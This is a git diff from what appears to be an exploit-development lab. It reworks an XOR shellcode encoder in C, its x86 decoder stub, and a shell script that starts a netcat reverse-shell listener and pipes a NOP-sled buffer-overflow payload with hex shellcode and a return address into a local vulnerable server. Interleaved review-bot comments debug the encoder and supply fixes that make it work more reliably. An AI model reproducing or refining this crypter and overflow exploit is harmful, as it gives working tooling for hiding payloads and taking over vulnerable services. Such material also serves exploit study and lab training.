-rw-r--r--crypter/xor2_decoder.asm63
-rw-r--r--crypter/xor2_encoder.c129
-rwxr-xr-xexploit_tcp.sh3
3 files changed, 136 insertions, 59 deletions
diff --git a/crypter/xor2_decoder.asm b/crypter/xor2_decoder.asm
index cc102b2..93bdedf 100644
--- a/crypter/xor2_decoder.asm
+++ b/crypter/xor2_decoder.asm
@@ -1,22 +1,61 @@
BITS 32
+; plain x86 | trailer
+; ---------------------------------------------------------------------------------------------
+; | decoder | 2 byte shellcode len | 1 byte xor key len | xor key (xor key len) | shellcode |
+; ----------------[XOR ENCODED]--------------------------------------------------[XOR ENCODED]-
+; | Reg: cx | Reg: dl | [esi]+3+dh | [esi]+3+dl+ebx
+
jmp short go
next:
-pop esi ; stackpointer -> start+len(encoder)
-xor ecx,ecx ; zero out some regs
-xor eax,eax
+pop esi ; get stackpointer := start+sizeof(decoder)
+
+xor ecx,ecx
+mov word cx,[esi] ; shellcode len (encoded)
+xor word cx,0x0101 ; decode shellcode len
+
+; dh := xor pad
+; dl := xor key len
xor edx,edx
-mov cl,0 ; buffer length
-mov dl,4 ; xor padding
+mov byte dl,[esi+2]
+
+xor ebx,ebx ; zero out
change:
-xor byte [esi + ecx],0
-mov byte al,[esi + ecx]
-dec cl
-jnz done ; no more bytes left
-dec dh
-jnz change
-mov dh,dl
+; calc memory location
+mov eax,esi
+push dword eax
+add dword [esp],0x3 ; shellcode len (2 bytes) + xor key len (1 byte)
+movzx eax,dl
+add [esp],eax
+add [esp],ebx
+pop dword eax ; eax holds the pointer to our next encoded byte
+
+mov edi,eax
+
+mov eax,esi ; <----- DBG
+push dword eax
+add dword [esp],0x3 ; see above
+movzx eax,dh
+add [esp],eax
+pop dword eax ; al holds the xor 1-byte-pad
+; TODO: not rly efficient, change it!
+push dword esi ; save our trailer pointer
+mov esi,[eax]
+xor eax,eax
+mov byte al,esi
+pop dword esi ; get our trailer pointer
+
+xor byte [edi],al
+
+inc ebx
+cmp ebx,ecx
+je done ; no more bytes left
+
+inc dh ; next xor 1-byte-pad
+cmp dh,dl ; check if xor pad == xor len
+jne change
+xor byte dh,dh
jmp change
done:
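Review bot: `mov byte al,esi` pairs an 8-bit destination with a 32-bit source, a combination NASM rejects as invalid operands as far as I can tell, so the decoder may not assemble as committed. The five lines from `push dword esi ; save our trailer pointer` to `pop dword esi ; get our trailer pointer` (the block flagged TODO) exist only to fetch one key byte through a dword load and collapse to the single byte load `mov al,[eax]`, which also stops `mov esi,[eax]` from reading three bytes past the selected key byte. The `; <----- DBG` marker on the second `mov eax,esi` reads as a leftover and should be dropped or turned into a real comment, e.g. `; eax := esi + 3 + dh, address of the current key byte`.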
diff --git a/crypter/xor2_encoder.c b/crypter/xor2_encoder.c
index cc46592..fc3f904 100644
--- a/crypter/xor2_encoder.c
+++ b/crypter/xor2_encoder.c
@@ -1,4 +1,4 @@
-// #DECODER=./xor_decoder.o
+// #DECODER=./xor2_decoder.o
// #SHELLCODE=../shellcode/hello.o
#define _GNU_SOURCE 1
@@ -6,7 +6,10 @@
#include <string.h>
#include <sys/time.h>
#include <stdlib.h>
+#include <stdint.h>
#include <unistd.h>
+#include <limits.h>
+#include <byteswap.h>
#ifdef _USE_CFG
#include "xor2_encoder.h"
@@ -14,17 +17,17 @@
#error "xor2_encoder.h config file missing including decoder && shellcode"
#endif
-#ifndef _CRYPTVAL
-#define _CRYPTVAL 0xff
-#endif
+#define XOR_KEYLEN 5
+#define SCLEN_XORKEY 0x0101
+#define TRAILER 3
#ifndef _OUTFILE
#define _OUTFILE "xor2_encoded.o"
#endif
-int
-getnumber(int n)
+long int
+getnumber(long int n)
{
int seed;
struct timeval tm;
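Review bot: The three new constants carry no comment although the decoder depends on them byte for byte: `TRAILER 3` must equal the `add dword [esp],0x3` in xor2_decoder.asm, and `SCLEN_XORKEY 0x0101` is there so a shellcode length below 256 does not leave a 0x00 high byte in the trailer. Worth recording that a length containing a 0x01 byte in either position xors back to a zero byte and is only caught at run time by eof_check, e.g. `/* len <= 0xff has a zero high byte; ^0x0101 masks it, but a 0x01 byte in either position reintroduces one (eof_check aborts) */` above the define, and `/* 2-byte shellcode len + 1-byte key len; must match the +3 in xor2_decoder.asm */` above `TRAILER`. The `getnumber` body widened here to `long int` continues outside the hunk; its `int seed` suggests the extra range may not actually be used, which is worth confirming against the body.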
@@ -36,11 +39,11 @@ getnumber(int n)
}
void
-print_code(const char *name, char *data, int len)
+print_code(const char *name, char *data, size_t len)
{
int i,l = 15;
- printf("unsigned long int l%s = %lu;\nchar %s[] = \n", name, (unsigned long int) strlen(data), name);
+ printf("unsigned long int l%s = %lu;\nchar %s[] = \n", name, (unsigned long int) len, name);
for (i = 0; i < len; i++) {
if (l >= 15) {
if (i) {
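Review bot: `len` is now `size_t` but the loop index declared in `int i,l = 15;` stays `int`, so `i < len` is a signed/unsigned comparison that `-Wsign-compare` will flag; `size_t i; int l = 15;` keeps the two counters on their own types. With a `size_t` length the printf can also drop the cast and use `%zu` instead of `(unsigned long int) len`. The rest of print_code continues outside the hunk.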
@@ -55,6 +58,52 @@ print_code(const char *name, char *data, int len)
printf("\";\n\n");
}
+long int
+eof_check(char *data, size_t len)
+{
+ long int i;
+
+ for (i = 0; i < len; i++) {
+ if ( *(char *)(data + i) == '\0' ) {
+ return i;
+ }
+ }
+ return -1;
+}
+
+char *
+xor_genkey(size_t keylen)
+{
+ char *key;
+ long int kd, rnd;
+ int i = 0;
+
+ key = calloc(sizeof(char), keylen);
+ while (i+sizeof(long int) < keylen) {
+ rnd = getnumber(LONG_MAX);
+ memcpy(&key[i], &rnd, sizeof(long int));
+ i += sizeof(long int);
+ }
+ kd = keylen - i;
+ if ( kd != 0 ) {
+ rnd = getnumber(LONG_MAX);
+ memcpy(&key[i], &rnd, kd);
+ }
+ return key;
+}
+
+void
+xor_encrypt(char *buf, size_t buflen, char *key, size_t keylen)
+{
+ int i;
+ unsigned char xb;
+
+ for (i = 0; i < buflen; i++) {
+ xb = key[i % keylen];
+ buf[i] ^= xb;
+ }
+}
+
void
err_n_xit(const char *exit_msg, const char *arg)
{
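Review bot: `xor_genkey` never checks the `calloc` result, so an allocation failure becomes a write through NULL in the `memcpy` that follows; `key = calloc(keylen, sizeof *key); if (key == NULL) err_n_xit("calloc", "xor_genkey");` fixes that and also puts the count and element size in their conventional order. Each key chunk is copied out of a `long` returned by `getnumber(LONG_MAX)`; if `getnumber` yields fewer than `sizeof(long)` random bytes (its body is not in this diff), the upper bytes of every chunk are constant and the key is weaker than its length suggests — worth a comment on the function or a byte-wise generator. `xor_encrypt` compares an `int i` against the `size_t buflen`, and `eof_check` a `long` against `size_t len`; declaring the loop indices `size_t` (keeping `long` only as eof_check's return, where -1 is the sentinel) removes the mixed-sign comparisons.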
@@ -74,66 +123,54 @@ err_n_xit(const char *exit_msg, const char *arg)
int
main(int argc, char **argv)
{
- int i, npos = 0, number = getnumber(_CRYPTVAL), nullbyte = 0;
+ int nullbyte = 0;
+ long int nb_idx;
int ldecoder = sizeof(decoder)-1; /* last byte is '\x00' */
- int lshellcode = sizeof(shellcode)-1; /* same as above */
- int first_arg = 1;
- char *result;
+ uint16_t lshellcode = (uint16_t) sizeof(shellcode)-1; /* same as above */
+ char *result, *mod_decoder, *xor_key;
FILE *outfile;
- printf("/* Using value %d to encode the shellcode. */\n", number);
printf("/* PRINT SHELLCODE */\n");
print_code("shellcode", shellcode, lshellcode);
printf("/* PRINT DECODER */\n");
print_code("decoder", decoder, ldecoder);
- for (i = 0; i < ldecoder; i++) {
- if (decoder[i] == '\x00') {
- if (first_arg) {
- decoder[i] = lshellcode;
- first_arg = 0;
- } else {
- decoder[i] = (unsigned char) number;
- npos = i;
- }
- printf("// decoder[%d] = %u (%02x)\n", i, (unsigned char) decoder[i], (unsigned char) decoder[i]);
- }
+ mod_decoder = malloc(ldecoder + TRAILER); // buffer size (2 bytes) + xor key len (1 byte)
+ memcpy(mod_decoder, decoder, ldecoder);
+ *(uint16_t *) (&mod_decoder[ldecoder]) = (uint16_t) (lshellcode ^ SCLEN_XORKEY);
+ *(uint8_t *) (&mod_decoder[ldecoder+2]) = (uint8_t) XOR_KEYLEN;
+ printf("/* shellcode length: decoder[%u] = %u bytes ^ 0x%04x = 0x%04x */\n", lshellcode, mod_decoder[ldecoder], SCLEN_XORKEY, *(uint16_t *) &mod_decoder[ldecoder]);
+ printf("/* xor key length: decoder[%u] = %u bytes = 0x%02x */\n", ldecoder+2, mod_decoder[ldecoder+2], mod_decoder[ldecoder+2]);
+
+ if ( (nb_idx = eof_check(mod_decoder , ldecoder+3)) != -1) {
+ printf("NULLBYTE DETECTED: decoder+0x%04x (%lu)\n", (unsigned int) nb_idx, nb_idx);
+ exit(-1);
}
- printf("\n");
- result = malloc(lshellcode);
+ result = calloc(ldecoder + lshellcode + TRAILER + XOR_KEYLEN, sizeof(char));
+ printf("/* total length = %d */\n", ldecoder + lshellcode + TRAILER + XOR_KEYLEN);
+ memcpy(result, mod_decoder, ldecoder + TRAILER);
+ free(mod_decoder);
do {
- memcpy(result, shellcode, lshellcode);
+ xor_key = xor_genkey(XOR_KEYLEN);
+ memcpy(result + ldecoder + TRAILER, xor_key, XOR_KEYLEN);
+ memcpy(result + ldecoder + TRAILER + XOR_KEYLEN, shellcode, lshellcode);
+ xor_encrypt(result + ldecoder + TRAILER + XOR_KEYLEN, lshellcode, xor_key, XOR_KEYLEN);
+ print_code("xor", xor_key, XOR_KEYLEN);
if (nullbyte == 1) {
- number = getnumber(_CRYPTVAL);
- fprintf(stderr, "New crypt value: %d (%02x)\n", number, number);
- decoder[npos] = number;
nullbyte = 0;
}
- for (i = 0; i < lshellcode; i++) {
- result[i] ^= number;
- if (result[i] == '\x00') {
- nullbyte = 1;
- fprintf(stderr, "Recode!\n");
- break;
- }
- }
+ free(xor_key);
} while (nullbyte == 1);
- memcpy(shellcode, result, lshellcode);
- free(result);
- result = malloc(ldecoder + lshellcode + 1);
- memcpy(result, (const void *) decoder, ldecoder);
- memcpy(result + ldecoder, shellcode, lshellcode);
- *(result + ldecoder + lshellcode) = '\0';
- print_code("result", result, ldecoder + lshellcode);
+ print_code("result", result, ldecoder + lshellcode + TRAILER + XOR_KEYLEN);
/* write2file */
outfile = fopen(_OUTFILE, "w+b");
if (outfile == NULL) err_n_xit("fopen", _OUTFILE);
- if (fwrite((void *) result, sizeof(char), strlen(result), outfile) != strlen(result)) err_n_xit("fwrite", _OUTFILE);
+ if (fwrite((void *) result, sizeof(char), ldecoder + lshellcode + TRAILER + XOR_KEYLEN, outfile) != (ldecoder + lshellcode + TRAILER + XOR_KEYLEN)) err_n_xit("fwrite", _OUTFILE);
if (fclose(outfile) != 0) err_n_xit("fclose", _OUTFILE);
fprintf(stderr, "outfile: %s\n", _OUTFILE);
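Review bot: `nullbyte` is initialised to 0 and, with the old `result[i] == '\x00'` scan removed, nothing in the rewritten do/while ever sets it to 1, so the loop runs exactly once and neither the random key nor the encoded shellcode is checked for 0x00 bytes — `eof_check` is applied only to the decoder plus trailer. The retry should be restored by running `eof_check` over `result + ldecoder + TRAILER` (key followed by encoded shellcode) after `xor_encrypt` and setting `nullbyte = 1` when it finds a zero, as sketched below; each iteration already recopies the plain shellcode, so a fresh key is all a retry needs. In the `NULLBYTE DETECTED` message `nb_idx` is a `long` printed with `%lu` — use `%ld` — and the length passed to that `eof_check` call should be `ldecoder + TRAILER` rather than the literal `ldecoder+3`. The `malloc` for `mod_decoder` and the `calloc` for `result` are unchecked; `err_n_xit` is already there for that. main continues past the end of the hunk.
```c
	do {
		nullbyte = 0;
		xor_key = xor_genkey(XOR_KEYLEN);
		// … unchanged: copy key and shellcode into result, xor_encrypt, print_code("xor", …) …
		/* retry with a fresh key if the key or the encoded shellcode contains a 0x00 byte */
		if (eof_check(result + ldecoder + TRAILER, XOR_KEYLEN + lshellcode) != -1) {
			fprintf(stderr, "Recode!\n");
			nullbyte = 1;
		}
		free(xor_key);
	} while (nullbyte == 1);
```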
diff --git a/exploit_tcp.sh b/exploit_tcp.sh
index 106489d..aecfe2c 100755
--- a/exploit_tcp.sh
+++ b/exploit_tcp.sh
@@ -7,7 +7,7 @@
# 79xNOP (0x90) + shellcode + 79xNOP (0x90) + return addr
echo "starting netcat reverse tcp server .."
-screen -d -m -S overcat /bin/netcat -l -s 127.0.0.1 -p 4444
+screen -c /dev/null -d -m -S overcat /bin/netcat -l -s 127.0.0.1 -p 4444
sleep 1
echo "starting exploitable tcp server .."
./overflow_tcp &
@@ -25,5 +25,6 @@ python -c 'print "\x90"*79 + \
"\x29\x3e\x5d\x96\xe6\xc9\x40\xa7\x02\x07\x02\xf9\xcf\xfd" + \
"\x03\xa2\x22\x81" + \
"\x90"*83 + "\x9d\xd4\xff\xff"' | nc -q 0 "$host" 3000
+read -p "[PRESS RETURN TO CONTINUE]"
screen -R overcat